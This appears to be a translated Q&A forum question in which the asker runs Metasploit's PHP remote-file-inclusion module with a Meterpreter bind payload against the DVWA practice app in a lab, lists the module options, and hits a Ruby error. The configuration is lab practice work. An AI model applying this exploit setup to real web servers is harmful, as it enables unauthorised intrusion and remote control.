【发布时间】:2014-06-28 18:24:40
【问题描述】:
我正在尝试利用 dvwa 文件包含漏洞。 我指的是这个教程: http://www.offensive-security.com/metasploit-unleashed/PHP_Meterpreter
当我运行“exploit”时,我收到以下错误: [-] 利用失败:nil:NilClass 的未定义方法 `remove_resource'
我设置的选项:
msf exploit(php_include) > show options
Module options (exploit/unix/webapp/php_include):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADERS no Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
PATH / yes The base directory to prepend to the URL to try
PHPRFIDB /home/david/msf/metasploit-framework/data/exploits/php/rfi-locations.dat no A local file containing a list of URLs to try, with XXpathXX replacing the URL
PHPURI /dvwa/vulnerabilities/fi/?page=XXpathXX no The URI to request, with the include parameter changed to XXpathXX
POSTDATA no The POST data to send, with the include parameter changed to XXpathXX
Proxies no Use a proxy chain
RHOST 172.16.246.131 yes The target address
RPORT 80 yes The target port
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
VHOST no HTTP server virtual host
Payload options (php/meterpreter/bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 172.16.246.131 no The target address
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(php_include) > run
[*] Started bind handler
[*] Using URL: http://0.0.0.0:8080/ORFRTphN
[*] Local IP: http://10.8.0.10:8080/ORFRTphN
[*] PHP include server started.
[-] Exploit failed: undefined method `remove_resource' for nil:NilClass
感谢您的帮助!
【问题讨论】:
-
你让它工作了吗?需要在我的答案中添加任何内容吗?
标签: php exploit metasploit